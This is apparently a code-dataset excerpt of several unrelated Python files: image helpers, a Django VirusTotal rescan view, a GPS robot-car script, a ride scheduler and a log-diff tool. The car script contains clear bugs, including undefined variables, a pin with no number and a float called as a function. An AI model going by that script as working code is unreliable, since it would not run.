theano.tensor.nnet import conv\nfrom sklearn.metrics import confusion_matrix\n\ndef img_show(img, title=None, margin=0.05, dpi=400, cmap = 'gray'):\n nda = img\n spacing = [1 ,1, 1]\n\n figsize = (1 + margin) * nda.shape[0] / dpi, (1 + margin) * nda.shape[1] / dpi\n extent = (0, nda.shape[1]*spacing[1], nda.shape[0]*spacing[0], 0)\n\n fig = plt.figure(figsize=figsize, dpi=dpi)\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n plt.set_cmap(cmap)\n ax.imshow(nda, extent=extent, interpolation=None)\n if title:\n plt.title('%s' % (title))\n return ax\n\ndef img_show_with_rect(img, rect =[10,10,20,20], ax = None, title=None, margin=0.05, dpi=400):\n import matplotlib.patches as patches\n if ax == None:\n ax = img_show(img, title=None, margin=0.05, dpi=dpi)\n\n ax.add_patch(\n patches.Rectangle(\n (rect[0], rect[1]), # (x,y)\n rect[2], # width\n rect[3], # height\n edgecolor = 'r',\n fill=False\n )\n )\n return ax\n\ndef findROI(img):\n img2 = ski.color.rgb2hsv(img)\n msk0v = ski.filters.threshold_otsu(img2[:,:,0])\n msk1v = ski.filters.threshold_otsu(img2[:,:,1])\n\n msk0 = img2[:,:,0] > msk0v\n msk1 = img2[:,:,1] > msk1v\n\n msk0 = morp.remove_small_objects(msk0, min_size=36)\n msk1 = morp.remove_small_objects(msk1, min_size=36)\n\n msk3 = np.logical_and(msk0, msk1)\n disk = morp.disk(20)\n msk3 = morp.binary_dilation(msk3, disk)\n\n msk = ski.img_as_int(msk3)\n return msk\n\ndef addMask(img, msk, color):\n cts = ski.measure.find_contours(msk, 0)\n for ct in cts:\n ct = ct[:, [1, 0]]\n pts = ct.astype(np.int32).reshape(-1, 1, 2)\n cv2.polylines(img, [pts], True, color, 5)\n return img\n\ndef addMaskOverlay(img, msk, color):\n# msk = msk.astype(np.uint8)\n alpha = 0.7\n# msk_jet = cv2.applyColorMap(msk, cv2.COLORMAP_JET)\n img_overlay = cv2.addWeighted(img, alpha, msk, 1 - alpha, 1);\n return img_overlay\n\n# msktype is 0 if it's a simple addition\n# msktype is 1 if it's an overlay\ndef doAddMask(imgName, mskName, color, outputName, msktype = 0):\n img = cv2.imread(imgName)\n if msktype == 0:\n msk = ski.io.imread(mskName, True) > 0\n img = addMask(img, msk, color)\n elif msktype == 1:\n msk = cv2.imread(mskName)\n img = addMaskOverlay(img, msk, color)\n cv2.imwrite(outputName, img)\n\ndef doAddMasks(imgName, mskName_list, color_list, outputName):\n img = cv2.imread(imgName)\n for mskName, color in zip(mskName_list, color_list):\n msk = ski.io.imread(mskName, True) > 0\n img = addMask(img, msk, color)\n cv2.imwrite(outputName, img)\n\ndef gaussian_filter(kernel_shape):\n x = np.zeros((kernel_shape, kernel_shape), dtype=theano.config.floatX)\n\n def gauss(x, y, sigma=2.0):\n Z = 2 * np.pi * sigma**2\n return 1./Z * np.exp(-(x**2 + y**2) / (2. * sigma**2))\n\n for i in xrange(kernel_shape):\n for j in xrange(kernel_shape):\n x[i,j] = gauss(i-4., j-4.)\n\n return x / np.sum(x)\n\n\ndef lecun_lcn(input, img_shape, kernel_shape, threshold=1e-4):\n \"\"\"\n Yann LeCun's local contrast normalization\n This is performed per-colorchannel!!!\n\n http://yann.lecun.com/exdb/publis/pdf/jarrett-iccv-09.pdf\n \"\"\"\n input = input.reshape((input.shape[0], 1, input.shape[1], input.shape[2]))\n X = T.matrix(dtype=input.dtype)\n X = X.reshape((len(input), 1, img_shape[0], img_shape[1]))\n\n filter_shape = (1, 1, kernel_shape, kernel_shape)\n filters = theano.shared(gaussian_filter(kernel_shape).reshape(filter_shape))\n\n convout = conv.conv2d(input=X,\n filters=filters,\n image_shape=(input.shape[0], 1, img_shape[0], img_shape[1]),\n filter_shape=filter_shape,\n border_mode='full')\n\n # For each pixel, remove mean of 9x9 neighborhood\n mid = int(np.floor(kernel_shape / 2.))\n centered_X = X - convout[:, :, mid:-mid, mid:-mid]\n\n # Scale down norm of 9x9 patch if norm is bigger than 1\n sum_sqr_XX = conv.conv2d(input=T.sqr(X),\n filters=filters,\n image_shape=(input.shape[0], 1, img_shape[0], img_shape[1]),\n filter_shape=filter_shape,\n border_mode='full')\n\n denom = T.sqrt(sum_sqr_XX[:, :, mid:-mid, mid:-mid])\n per_img_mean = T.mean(denom, axis=(1, 2))\n divisor = T.largest(per_img_mean.dimshuffle(0, 1, 'x', 'x'), denom)\n divisor = T.maximum(divisor, threshold)\n\n new_X = centered_X / divisor\n #new_X = theano.tensor.flatten(new_X, outdim=3)\n\n f = theano.function([X], new_X)\n return f(input)\n\n\ndef lcn_image(images, kernel_size=9):\n \"\"\"\n This assumes image is 01c and the output will be c01 (compatible with conv2d)\n\n :param image:\n :param inplace:\n :return:\n \"\"\"\n image_shape = (images.shape[1], images.shape[2])\n if len(images.shape) == 3:\n # this is greyscale images\n output = lecun_lcn(images, image_shape, kernel_size)\n else:\n # color image, assume RGB\n r = images[:, :, :, 0]\n g = images[:, :, :, 1]\n b = images[:, :, :, 2]\n\n output = np.concatenate((\n lecun_lcn(r, image_shape, kernel_size),\n lecun_lcn(g, image_shape, kernel_size),\n lecun_lcn(b, image_shape, kernel_size)),\n axis=1\n )\n return output\n\n\ndef global_contrast_normalize(X, scale=1., subtract_mean=True, use_std=False,\n sqrt_bias=0., min_divisor=1e-8):\n \"\"\" Code adopted from here: https://github.com/lisa-lab/pylearn2/blob/master/pylearn2/expr/preprocessing.py\n but can work with b01c and bc01 orderings\n\n An Analysis of Single-Layer\n Networks in Unsupervised Feature Learning\". AISTATS 14, 2011.\n http://www.stanford.edu/~acoates/papers/coatesleeng_aistats_2011.pdf\n \"\"\"\n assert X.ndim > 2, \"X.ndim must be more than 2\"\n scale = float(scale)\n assert scale >= min_divisor\n\n # Note: this is per-example mean across pixels, not the\n # per-pixel mean across examples. So it is perfectly fine\n # to subtract this without worrying about whether the current\n # object is the train, valid, or test set.\n aggr_axis = tuple(np.arange(len(X.shape) - 1) + 1)\n mean = np.mean(X, axis=aggr_axis, keepdims=True)\n if subtract_mean:\n X = X - mean[:, np.newaxis] # Makes a copy.\n else:\n X = X.copy()\n\n if use_std:\n # ddof=1 simulates MATLAB's var() behaviour, which is what Adam\n # Coates' code does.\n ddof = 1\n\n # If we don't do this, X.var will return nan.\n if X.shape[1] == 1:\n ddof = 0\n\n normalizers = np.sqrt(sqrt_bias + np.var(X, axis=aggr_axis, ddof=ddof, keepdims=True)) / scale\n else:\n normalizers = np.sqrt(sqrt_bias + np.sum((X ** 2), axis=aggr_axis, keepdims=True)) / scale\n\n # Don't normalize by anything too small.\n normalizers[normalizers < min_divisor] = 1.\n X /= normalizers[:, np.newaxis] # Does not make a copy.\n return X\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"218440106","text":"'''\nneed to wait at least 15 minutes to get the lastest results\n\nwebsite needed:\n https://www.virustotal.com/#/home/upload\n using a Publiv API of virustotal\n The Public API is limited to 4 requests per minute.\n The Public API must not be used in commercial products or services.\n Have an addition limit of daily and monthly limits. (Please refer to the site to find out more)\n'''\nfrom django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\nfrom . import settings\n\nimport json\nimport requests\nimport sys\nimport time\nimport webbrowser\n\nimport os\n\ndef debug(string):\n debug_mode = True\n if(debug_mode):\n print(string)\n\ndef button(request):\n return render(request, 'home.html')\n\ndef rescanHashVirustotal(fromI, apikey, f1, hashArray):\n\n for x in range(fromI, fromI + 4):\n url = 'https://www.virustotal.com/vtapi/v2/file/rescan'\n try:\n params = {'apikey': apikey,\n 'resource': f1[x]}\n r = requests.post(url, params=params, verify=True)\n print(x)\n\n toStore = r.content\n # print(toPrint)\n\n json_data = json.loads(toStore)\n scanId = json_data['scan_id']\n print(scanId)\n hashArray.append(scanId)\n except:\n hashArray.append('empty')\n return hashArray\n\ndef hashSend(request):\n hashArray = []\n f1 = []\n toWait = 0\n timestr = time.strftime(\"%d%m%y-%H.%M.%S\")\n timestrtxt = \" \" + timestr + \".txt\"\n VTkey1 = settings.VT_KEY_1\n VTkey2 = settings.VT_KEY_2\n data = []\n try:\n debug(\"what am i \")\n temp_file = request.FILES['send']\n fs = FileSystemStorage()\n fsName = fs.save(temp_file.name, temp_file)\n urlFile = open(\"media/\" + fsName, 'r') #urlFile = open(r'C:\\Users\\SP-F1\\Desktop\\scripting\\Python script\\urlScript\\url.txt', 'r')#Open file as written in the path, and save each line into the array 'f1'\n f1 = urlFile.readlines()\n size = len(f1) # The number of lines.\n\n hashArray = rescanHashVirustotal(0, VTkey1, f1, hashArray)\n hashArray = rescanHashVirustotal(4, VTkey2, f1, hashArray)\n\n for lines in hashArray:\n debug(lines)\n\n data.append(\"Please come back in 1 hours time.\")\n urlFile.close()\n except:\n data.append(\"Error in sending hash file to virustotal\")\n return render(request, 'home.html', {'hashFeedback': data})","sub_path":"validator/hash_send.py","file_name":"hash_send.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"564166585","text":"# car5 but with a class\nimport time, board, pulseio, busio, adafruit_gps, adafruit_lsm9ds1, hcsr04_lib\nfrom adafruit_motor import servo\nimport math as m\n\n# tweak parameters\nrefreshRate = 0.1\nlostSignalTimer = 5.0\nsonarSensitivityFront = 50.0 # obstacle distance in cm before avoiding\ndefaultMoveSpeed = 0.7\ndefaultTurnSpeed = 0.5\n\n# -------- set up ultrasonic sensor -----------\ntrig1 = board.D\necho1 = board.D60\nsonar_front = hcsr04_lib.HCSR04(trig1, echo1)\n\n\n# -------- set up servos -----------\n# create a PWMOut object on the control pin.\npwm1 = pulseio.PWMOut(board.D31, duty_cycle=0, frequency=50)\npwm2 = pulseio.PWMOut(board.D36, duty_cycle=0, frequency=50)\n\n# pulse widths exercise the full range of the 169 servo, other servos are different\nservo1 = servo.ContinuousServo(pwm1, min_pulse=500, max_pulse=2500)\nservo2 = servo.ContinuousServo(pwm2, min_pulse=500, max_pulse=2500)\n\n# -------- set up GPS -----------\n# Define RX and TX pins for the board's serial port connected to the GPS.\n# These are the defaults you should use for the GPS FeatherWing.\n# For other boards set RX = GPS module TX, and TX = GPS module RX pins.\nRX = board.RX1\nTX = board.TX1\n\n\n# Create a serial connection for the GPS connection using default speed and\n# a slightly higher timeout (GPS modules typically update once a second).\nuart = busio.UART(TX, RX, baudrate=9600, timeout=30)\n\n# for a computer, use the pyserial library for uart access\n#import serial\n#uart = serial.Serial(\"/dev/ttyUSB0\", baudrate=9600, timeout=3000)\n\n# Create a GPS module instance.\ngps = adafruit_gps.GPS(uart, debug=False)\n\n# Initialize the GPS module by changing what data it sends and at what rate.\n# These are NMEA extensions for PMTK_314_SET_NMEA_OUTPUT and\n# PMTK_220_SET_NMEA_UPDATERATE but you can send anything from here to adjust\n# the GPS module behavior:\n# https://cdn-shop.adafruit.com/datasheets/PMTK_A11.pdf\n\n# Turn on the basic GGA and RMC info (what you typically want)\ngps.send_command(b'PMTK314,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\n# Turn on just minimum info (RMC only, location):\n#gps.send_command(b'PMTK314,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\n# Turn off everything:\n#gps.send_command(b'PMTK314,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\n# Tuen on everything (not all of it is parsed!)\n#gps.send_command(b'PMTK314,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0')\n\n# Set update rate to once a second (1hz) which is what you typically want.\ngps.send_command(b'PMTK220,1000')\n# Or decrease to once every two seconds by doubling the millisecond value.\n# Be sure to also increase your UART timeout above!\n#gps.send_command(b'PMTK220,2000')\n# You can also speed up the rate, but don't go too fast or else you can lose\n# data during parsing. This would be twice a second (2hz, 500ms delay):\n#gps.send_command(b'PMTK220,500')\n\n# initialize gps to give it time to get the correct current coordinates\n\n\n# Main loop runs forever printing the location, etc. every second.\n\n# ---------------- copied ------------------\n# startTime = time.monotonic()\n# last_print = time.monotonic()\n# while last_print - startTime < 3.0:\n# # Make sure to call gps.update() every loop iteration and at least twice\n# # as fast as data comes from the GPS unit (usually every second).\n# # This returns a bool that's true if it parsed new data (you can ignore it\n# # though if you don't care and instead look at the has_fix property).\n# gps.update()\n# # Every second print out current location details if there's a fix.\n# current = time.monotonic()\n# if current - last_print >= 0.1:\n# print(\"Setting up...\")\n# last_print = current\n# if not gps.has_fix:\n# # Try again if we don't have a fix yet.\n# print('Waiting for fix...')\n# continue\n# # We have a fix! (gps.has_fix is true)\n# # Print out details about the fix like location, date, etc.\n# print('=' * 40) # Print a separator line.\n# print('Fix timestamp: {}/{}/{} {:02}:{:02}:{:02}'.format(\n# gps.timestamp_utc.tm_mon, # Grab parts of the time from the\n# gps.timestamp_utc.tm_mday, # struct_time object that holds\n# gps.timestamp_utc.tm_year, # the fix time. Note you might\n# gps.timestamp_utc.tm_hour, # not get all data like year, day,\n# gps.timestamp_utc.tm_min, # month!\n# gps.timestamp_utc.tm_sec))\n# print('Latitude: {0:.6f} degrees'.format(gps.latitude))\n# print('Longitude: {0:.6f} degrees'.format(gps.longitude))\n\ndef main():\n while True:\n move(1.0)\n\nclass Car:\n def __init__(self):\n self.v1 = 0.0\n self.v2 = 0.0\n\ndef moveToCoord(lat2, lon2):\n # refreshRate = 0.1\n print(\"moving to \" + str(lat2) + \", \" + str(lon2))\n startTime = time.monotonic()\n\n lat1 = lon1 = None\n\n last_print = time.monotonic()\n last_signal = time.monotonic()\n dlat = dlon = 1.0\n while True:\n gps.update()\n current = time.monotonic()\n if current - last_print >= refreshRate:\n last_print = current\n\n # if not gps.has_fix:\n # # Try again if we don't have a fix yet.\n # print('Waiting for fix...' + str(current - startTime))\n # continue\n\n if gps.has_fix:\n last_signal = time.monotonic()\n # Print out details about the fix like location, date, etc.\n print('=' * 40) # Print a separator line.\n print('Fix timestamp: {}/{}/{} {:02}:{:02}:{:02}'.format(\n gps.timestamp_utc.tm_mon, # Grab parts of the time from the\n gps.timestamp_utc.tm_mday, # struct_time object that holds\n gps.timestamp_utc.tm_year, # the fix time. Note you might\n gps.timestamp_utc.tm_hour, # not get all data like year, day,\n gps.timestamp_utc.tm_min, # month!\n gps.timestamp_utc.tm_sec))\n print('Latitude: {0:.10f} degrees'.format(gps.latitude))\n print('Longitude: {0:.10f} degrees'.format(gps.longitude))\n # error: ValueError: unknown format code 'f' for object of type 'str'\n # when lat and lon are unintialized, value = None\n if gps.satellites is not None:\n print('# satellites: {}'.format(gps.satellites))\n lat1 = gps.latitude\n lon1 = gps.longitude\n dlat = (lat1 - lat2)\n dlon = (lon1 - lon2)\n print((dlat, dlon)) # if dist > 1.0 else move(1.0)\n\n if (abs(dlat) > 0.0001 or abs(dlon) > 0.0001):\n move(1.0)\n else:\n stop()\n\n # TODO: turns + move --> smoother transitions\n relativeBearing = bearing(lat1, lon1, lat2, lon2) - heading() # angle in degrees CW from heading to destination\n turn(relativeBearing() / 180) # want relativeBearing to oscillate around 0\n print(bearing())\n dist = coordDist(lat1, lon1, lat2, lon2)\n\n else:\n move(defaultMoveSpeed)\n # lostSignalTimer = 5.0\n # if time.monotonic() - last_signal > lostSignalTimer:\n # # if lost signal, stop after 5 sec timer\n # stop()\n\n # check for obstacles\n if sonar_front.dist_cm() < sonarSensitivityFront:\n stop()\n # turn(defaultTurnSpeed)\n\n stop()\n\ndef setV(v):\n if v < 0:\n return v if v >= -1.0 else -1.0\n return v if v <= 1.0 else 1.0\n\ndef stop():\n print(\"stop\")\n servo1.throttle = 0.0\n servo2.throttle = 0.0\n\ndef turn(dv, timer=0.1, pivot=False):\n vv1 = setV(v1 + dv)\n vv2 = setV(v2 + dv)\n servo1.throttle = vv1\n servo2.throttle = vv2\n # time.sleep(timer)\n\ndef move(v, timer=0.1):\n servo1.throttle = setV(v)\n servo2.throttle = setV(-v)\n # time.sleep(timer)\n return (v, -v)\n\n# angle in degrees CW from North to direction car is pointing\ndef heading():\n mag_x, mag_y, mag_z = sensor.magnetic\n # mag_x = 1.0\n # mag_y = 1.0\n return m.degrees(m.atan(mag_x / mag_y))\n\n# angle in degrees CW from North to destination\ndef bearing(lat1, lon1, lat2, lon2):\n # REF: https://www.movable-type.co.uk/scripts/latlong.html\n phi1, phi2, lambda1, lambda2 = map(m.radians, [lat1, lat2, lon1, lon2])\n y = m.sin(lambda2 - lambda1) * m.cos(phi2)\n x = m.cos(phi1) * m.sin(phi2) \\\n - m.sin(phi1) * m.cos(phi2) \\\n * m.cos(phi2 - phi1)\n return m.degrees(m.atan2(y, x))\n\ndef deinit():\n sonar.deinit()\ndeinit()\nmain()","sub_path":"car52.py","file_name":"car52.py","file_ext":"py","file_size_in_byte":8699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"167640263","text":"from re import compile\n\nreg_ex_letters = compile(r\"[A-Za-z]\")\n\nreg_ex_punctuation = compile(\n r\"[\\!\\\"\\#\\$\\%\\&\\\\\\'\\(\\)\\*\\+\\,\\-\\.\\/\\:\\;\\<\\=\\>\\?\\@\\[\\\\\\\\\\]\\^\\_\\`\\{\\|\\}\\~]\"\n)\n\nwith open(\"text.txt\", \"rt\") as file_in:\n with open(\"output.txt\", \"wt\") as file_out:\n file_out.writelines(\n [\n f\"Line {k}: {v.strip()} ({len(reg_ex_letters.findall(v))})({len(reg_ex_punctuation.findall(v))})\\n\"\n for k, v in enumerate(file_in.readlines(), 1)\n ]\n )\n","sub_path":"ADVANCED_MODULE/07_File_Handling/Line_Numbers.py","file_name":"Line_Numbers.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"369794744","text":"class Car:\n nb_car = 0\n step = 0\n maxStep = 0\n score = 0\n bonus = 0\n bonusMultiplier = 1 #the lower it is, the more important bonuses are (0= rides[self.occupation][4]:\n self.move(self.target[0],self.target[1])\n if self.pos == self.target:\n if self.inRides == 0:\n self.target = (rides[self.occupation][2],rides[self.occupation][3])\n self.inRides = 1\n elif self.inRides == 1:\n self.inRides =0\n self.rCompleted.append(self.occupation)\n self.occupation = -1\n else:\n print(\"error\")\n if self.occupation == -1 and self.stopped == 0:\n closest = self.findMostProfitable(rides)\n if closest != -1:\n self.assign(closest, rides[closest])\n\n elif closest == -1:\n self.stopped = 1\n\n\n #return rides\n\n def distance(self, a,b): #target is (x,y)\n return abs(self.pos[0]-a)+abs(self.pos[1]-b)\n\n def findClosestAcceptable(self, rides):\n closest = (999999999999999999, -1) # distance, idRide\n for ride in rides:\n if rides[ride][6] == 0:\n distance = self.distance(rides[ride][0],rides[ride][1])\n if (self.distance(rides[ride][0],rides[ride][1])+Car.step) <= rides[ride][4]:\n distance *= Car.bonusMultiplier\n timeNeeded = (self.distance(rides[ride][0],rides[ride][1])+abs(rides[ride][2] - rides[ride][0]) + abs(rides[ride][3] - rides[ride][1])+Car.step)\n if distance < closest[0] and timeNeeded <= rides[ride][5] and timeNeeded <= Car.maxStep:\n closest = (self.distance(rides[ride][0],rides[ride][1]),ride)\n\n return closest[1]\n\n def findMostProfitable(self, rides):\n mostProfitables = (0, -1)\n for ride in rides:\n if rides[ride][6] == 0:\n score = 0\n distance = self.distance(rides[ride][0], rides[ride][1])\n timeNeeded = (distance + abs(rides[ride][2] - rides[ride][0]) + abs(rides[ride][3] - rides[ride][1]))+Car.step\n if timeNeeded <= rides[ride][5] and timeNeeded <= Car.maxStep:\n score += abs(rides[ride][2] - rides[ride][0]) + abs(rides[ride][3] - rides[ride][1])\n if distance + Car.step <= rides[ride][4]:\n score += Car.bonus\n if (score/timeNeeded) > mostProfitables[0]:\n mostProfitables =((score/timeNeeded),ride)\n return mostProfitables[1]\n\n\n def move(self,a,b):\n x = self.pos[0]\n y = self.pos[1]\n if x!=a:\n if x < a:\n x += 1\n elif x > a:\n x -=1\n elif y!=b:\n if y < b:\n y+=1\n elif y > b:\n y-=1\n self.pos = (x,y)\n","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"79335684","text":"from django import template\nfrom cart import cart\n\nregister = template.Library()\n\n@register.inclusion_tag(\"cart/cart_box.html\")\ndef cart_box(request):\n box_count = cart.cart_count(request)\n return {\n 'box_count': box_count,\n}\n","sub_path":"cart/templatetags/cart_filters.py","file_name":"cart_filters.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"387037530","text":"#!/usr/bin/python3\n\nimport sys, os \nimport subprocess as sub \n\nfrom itertools import groupby \nfrom operator import itemgetter\nfrom collections import namedtuple\n\nfrom testparser import *\nfrom fdfetcher import *\n\n# nfd contains NEW result\n# ofd contains OLD result\n# sum is for create a file to store summery\n\"\"\"\ndef DiffTests(nfd,ofd,sum=None):\n #check file exist or not \n print('=== > Diff ...ING')\n if os.path.isfile(nfd) and os.path.isfile(ofd):\n pass\n else:\n raise ValueError(\"Make sure %s,%s exist !\",nfd,ofd)\n\n # TODO: [ISSUE] newfd/oldfd can only be handled once, \n #with open(nfd, 'r') as newfd, open(ofd, 'r') as oldfd:\n # # legacy fail\n # oldfail = set(newfd).intersection(oldfd) \n # ### here , iterator oldfd/newfd consumed up .... so below data set all empty \n # # legacy fail\n # newfail = set(newfd)-set(oldfd) \n # # failure in old but pass in new \n # fixedfail = set(oldfd)-set(newfd) \n\n with open(nfd, 'r') as newfd, open(ofd, 'r') as oldfd:\n oldfail = set(newfd).intersection(oldfd)\n print('\\n####################\\n[##### OLD #####]')\n for i in sorted(oldfail):\n print(i.strip())\n\n with open(nfd, 'r') as newfd, open(ofd, 'r') as oldfd: \n # legacy fail\n newfail = set(newfd)-set(oldfd) \n print('\\n####################\\n[##### New #####]')\n for i in sorted(newfail):\n print(i.strip())\n\n with open(nfd, 'r') as newfd, open(ofd, 'r') as oldfd:\n # failure in old but pass in new \n fixedfail = set(oldfd)-set(newfd) \n print('\\n####################\\n[##### FIXED #####]')\n for i in sorted(fixedfail):\n print(i.strip())\n\"\"\"\n# parse raw log file\ndef DiffTestsFilter(nlog,olog,sum=None):\n #check file exist or not \n print('=== > Diff ...ING')\n if os.path.isfile(nlog) and os.path.isfile(olog):\n pass\n else:\n raise ValueError(\"Make sure %s,%s exist !\",nlog,olog)\n \n NewList = []\n OldList = []\n \n ErrTestTuple = namedtuple('ErrTestTuple', ['errname','testid'])\n # Only namedtuple can -> set , dict cannot \n with open(nlog, 'r') as newfd, open(olog, 'r') as oldfd:\n #filterRegex = r\"(?P@@@@ First error msg.*$|Error Detected:)(?:(?:\\n|.)*?)(?P(?:&&&&) (?:PASSED|FAILED|WAIVED) cudnnTest.*$)\"\n filterFailReg = r\"(@@@@ First error msg.*$|Error Detected:)(?:(?:\\n|.)*?)((?:&&&&) (?:FAILED) cudnnTest.*$)\"\n for rnew in re.findall(filterFailReg, newfd.read(),re.MULTILINE):\n NewList.append(ErrTestTuple(*rnew))\n #NewList.append(rnew.groupdict())\n for rold in re.findall(filterFailReg, oldfd.read(),re.MULTILINE):\n OldList.append(ErrTestTuple(*rold))\n #OldList.append(rold.groupdict())\n # before groupby(the key \"errname\") , need to sort list first\n NewList.sort(key=lambda t:t.errname) \n OldList.sort(key=lambda t:t.errname) \n \n #for i in NewList:\n # print('NewList ',i)\n oldfailSet = set(NewList).intersection(set(OldList))\n print('\\n####################\\n[##### OLD #####]')\n for err, testItem in groupby(oldfailSet,key=lambda t:t.errname):\n print(\"[error Info] \\n\\t%s \\n\" % err)\n for t in testItem:\n print('\\t',t.testid)\n\n newfailSet = set(NewList) - set(OldList)\n print('\\n####################\\n[##### New #####]')\n for err, testItem in groupby(newfailSet,key=lambda t:t.errname):\n print(\"[error Info] \\n\\t%s \\n\" % err)\n for t in testItem:\n print('\\t',t.testid)\n\n fixedSet = set(OldList) - set(NewList)\n print('\\n####################\\n[##### Fixed #####]')\n for err, testItem in groupby(fixedSet,key=lambda t:t.errname):\n print(\"[error Info] \\n\\t%s \\n\" % err)\n for t in testItem:\n print('\\t',t.testid)\n\ndef LocateFd(path,filepat):\n print('Looking for : %s'% filepat)\n for (ThisLeveldirs, sub_dirs, files) in os.walk(path):\n for fd in files:\n if filepat in fd:\n # ThisLeveldirs is where fd located\n return os.path.join(ThisLeveldirs,fd)\n #print(\"no files at this level\")\n return None\n\"\"\"\n##################\n###### No.01######\n##################\n# UUID lists group by keys\n# arbitrary lists TODO \n# arbitrary keys to compare \ndef DiffUUIDMixed(ResuListx2,key1='suite',key2='cid'):\n grouper = itemgetter(key1, key2)\n ResuListx2.sort(key=grouper)\n for key, testItem in groupby(ResuListx2,key=grouper):\n print('===== [TID Groups] ===== \\n\\t',key)\n \n ResuGroup = []\n count = 0\n for t in testItem:\n ResuGroup.append(t) \n count = count + 1\n print(\"Contain: %d member\"%count) \n \n if count == 1:\n # nothing to compare \n tsuite = ResuGroup[0]\n print(\"[Single suite]\\n\\t\",tsuite.values())\n print('====================',key)\n elif count == 2:\n # both suites \"failed\" AND both have log, makes sense to DIFF \n t1,t2 = ResuGroup\n if (t1['resu'] == 'failed' and t2['resu'] == 'failed')\\\n and t1['log'] \\\n and t2['log']:\n print(\"[Diff suite]\\n\")\n print(\"\\t\",t1.values())\n print(\"\\t\",t2.values())\n print('====================',key) \n\n log1 = LocateFd(locTrgdir,t1['log']+'.log')\n log2 = LocateFd(locTrgdir,t2['log']+'.log')\n\n if log1 is None or log2 is None:\n # it is for \"failed\" on \"BADDRIVER\" which display 'log' but no log generated \n print(\"[Failed to locate log in suite] Double check \\n\")\n print(\"\\t\",t1.values())\n print(\"\\t\",t2.values()) \n else:\n #flog1 = TestFilter(log1,keyword=\"FAILED\",logfail=True, diffuuid=True)\n #flog2 = TestFilter(log2,keyword=\"FAILED\",logfail=True, diffuuid=True)\n print('CMP...ing :',flog1,flog2)\n #DiffTests(flog1,flog2)\n DiffTestsFilter(log1,log2)\n elif t1['resu'] == 'passed' or t2['resu'] == 'passed':\n print(\"[PASS in suite] Compare by testparser \\n\")\n print(\"\\t\",t1.values())\n print(\"\\t\",t2.values()) \n elif not t1['log'] or not t2['log']:\n # one log is empty\n print(\"[EMPTY log in suite] Re-Run \\n\")\n print(\"\\t\",t1.values())\n print(\"\\t\",t2.values()) \n else:\n print('***** [WARNING] count is %d' % count)\n for r in ResuGroup:\n print(r)\n\"\"\"\n###################\n###### No.02 ######\n###################\n# Pair (new,old) entry AND can tell new/old\n\ndef DiffUUIDSep(RListNew, RListOld, key1='suite',key2='cid'):\n # new combo key - area I care/filter \n ComkeyNew = {(d[key1], d[key2]): d for d in RListNew}\n ComkeyOld = {(d[key1], d[key2]): d for d in RListOld}\n\n # Full lists:\n # Pair (newList,OldList) based on combo key (suite/cid)\n RListPair = [(ComkeyNew.get(k, None), ComkeyOld.get(k, None)) for k in set(ComkeyNew) | set(ComkeyOld)]\n\n for r in RListPair:\n new,old=r\n # check if only one valid result only\n if None in r:\n # nothing to compare \n print(\"\\n**********************************\\n\")\n print(\"\\t[Single suite]\\n\\t\")\n print('[new uuid] : ',new)\n print('[old uuid] : ',old)\n else:\n print(\"\\n**********************************\\n\")\n # both suites \"failed\" AND both have log, makes sense to DIFF \n if (new['resu'] == 'failed' and old['resu'] == 'failed')\\\n and new['log'] \\\n and old['log']:\n print(\"[Diff suite]\\n\")\n print(\"\\t\",new.values())\n print(\"\\t\",old.values())\n\n lognew = LocateFd(locTrgdir,new['log']+'.log')\n logold = LocateFd(locTrgdir,old['log']+'.log')\n\n if lognew is None or logold is None:\n # it is for \"failed\" on \"BADDRIVER\" which display 'log' but no log generated \n print(\"[Failed to locate log in suite] Double check \\n\")\n print(\"\\t new: \",lognew.values())\n print(\"\\t old: \",logold.values()) \n else:\n flognew= TestFilter(lognew,keyword=\"FAILED\",logfail=True, diffuuid=True)\n flogold= TestFilter(logold,keyword=\"FAILED\",logfail=True, diffuuid=True)\n print('CMP...ing ')\n print('[new:%s] \\n', flognew)\n print('[old:%s] \\n', flogold)\n #DiffTests(flognew,flogold)\n DiffTestsFilter(flognew,flogold)\n\n elif new['resu'] == 'passed' or old['resu'] == 'passed':\n print(\"[PASS in suite] Compare by testparser \\n\")\n print(\"[new:%s]\" % new.values())\n print(\"[old:%s]\" % old.values()) \n elif not new['log'] or not old['log']:\n # one log is empty\n print(\"[EMPTY log in suite] Re-Run \\n\")\n print(\"\\t\",new.values())\n print(\"\\t\",old.values()) \n \n \nif __name__==\"__main__\":\n import sys\n if(len(sys.argv) < 2):\n print(\"PROG /ws/abspath/src.log /ws/abspath/src.fail\")\n print(\"compare different uuid's test suite\")\n else:\n newfd = sys.argv[1]\n oldfd = sys.argv[2] \n #DiffTests(newfd, oldfd) \n DiffTestsFilter(flog1,flog2)\n","sub_path":"src/difftest.py","file_name":"difftest.py","file_ext":"py","file_size_in_byte":9989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"561144866","text":"\nfrom utils import *\nfrom fastai.callbacks import *\nimport torchvision\n\ntorch.multiprocessing.set_sharing_strategy('file_system')\n\n#some parameters\ndebug = 0\nenable_lr_find = 1\nnow_str = now2str(format=\"%Y-%m-%d_%H-%M-%S\")\ntxlog = tx.SummaryWriter(f'../tblog/{now_str}')\n\narch = models.resnet18\nim_size = 224\nif debug == 1:\n #arch = 